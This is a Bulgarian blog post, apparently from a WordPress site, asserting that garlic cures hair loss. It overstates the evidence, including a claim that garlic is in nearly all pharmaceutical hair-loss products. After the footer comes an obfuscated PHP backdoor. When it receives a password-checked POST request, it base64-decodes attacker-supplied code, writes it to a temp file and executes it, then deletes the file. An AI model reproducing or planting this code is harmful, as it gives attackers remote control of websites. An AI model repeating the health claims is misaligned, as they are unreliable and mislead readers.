Помага ли чесънът при косопад | Косопад

Да спрем косопада с чесън

Чесън за лечение на косопад

Чесън за лечение на косопад

Много рецепти препоръчват третиране с чесън при силен косопад. Според опитните билкари този зеленчук е изключително полезен при оплешивяване и е в състояние да стори истински чудеса. Все пак – вярно ли е, че чесънът наистина лекува косопад?

Определено да. Свидетелствата за това са твърде много, като чесънът може да бъде използван вътрешно и външно за лечение на косопад. Когато го приемаме като храна, той действа прочистващо на цялото тяло, има свойствата на натурален антибиотик и антисептик, лекува цяла поредица от болестни състояния.

Когато говорим за външно третиране с чесън при косопад е важно да отбележим, че съществува и една доста неприятна страна – силната миризма. Имайте предвид, че когато правите подобни процедури е препоръчително това да не става преди ваша поява на публично място, защото и най – малкото съприкосновение с някаква течност, определено ще държи всички останали на доста голямо разстояние от вас.

За да се намали неприятната миризма на чесъна, при процедурите срещу косопад е удачно да се добави и малко етерично масло, което до известна степен тушира проблема. Все пак не бива да забравяме, че здравето изисква жертви и е добре да се абстрахираме срещу страничните ефекти.

В заключение ще кажем, че чесънът наистина е в състояние да лекува или поне да облекчава симптомите на косопад. Поредното доказателство затова е фактът, че той се използва и в почти всички фармацевтични продукти срещу оплешивяване.

чесън при косопад

Чесън при косопад

03. юли 2013 17:16:47 от Косопад
Категории: Любопитно за косопада | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}